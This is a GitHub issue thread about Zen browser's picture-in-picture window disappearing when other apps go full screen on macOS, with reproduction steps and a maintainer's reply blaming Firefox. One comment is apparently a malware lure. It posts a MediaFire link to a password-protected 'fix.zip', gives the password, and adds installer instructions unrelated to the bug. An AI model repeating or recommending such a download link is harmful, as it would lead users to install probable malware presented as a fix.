### ISSUE TITLE
 Firefox's PIP doesn't work in macOS full screen

### ISSUE THREAD

**Issue by kazifarhan199** [zen-browser/desktop#906]
I know it is some thing wrong with Firefox but the bug has persisted for years and I have lost hope of it being fixed there. (https://bugzilla.mozilla.org/show_bug.cgi?id=1688932)

It is something that annoyed me enough that I stopped using Firefox.
I am hoping we can fix it here.
Not saying it needs to be fixed right away but will be good if it will be fixed at some point.

## What happens ?
On macos if you full screen a app it creates new virtual desktop for that app.

So when you have multiple apps fullscreened and enter PIP, the PIP window shows up on the main virtual desktop and the firefox virtual desktop, but if you move to another apps virtual desktop the PIP goes away(or is hidden and you can't see it)

## How to reproduce it ?
Open any video in picture in picture. then open another app like notes and full screen(click on green full screen button) the notes app (will full screen in a different virtual desktop), at this point you will not be able to see the PIP window.

## How can we resolve it ?
One option is to add a setting (even if in about:config) to allow users to use macos native PIP, it is not perfect but it works and does not get hidden.

### Reproducible?

- [ ] I have checked that this issue cannot be reproduced on Mozilla Firefox.

### Version

1.0.0-a.29

### Severity impact

Low

### What platform are you seeing the problem on?

macOS - aarch64, macOS - Intel

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mauro-balades** [comment]
This is likely an issue with firefox. Please file a bug to them 👍
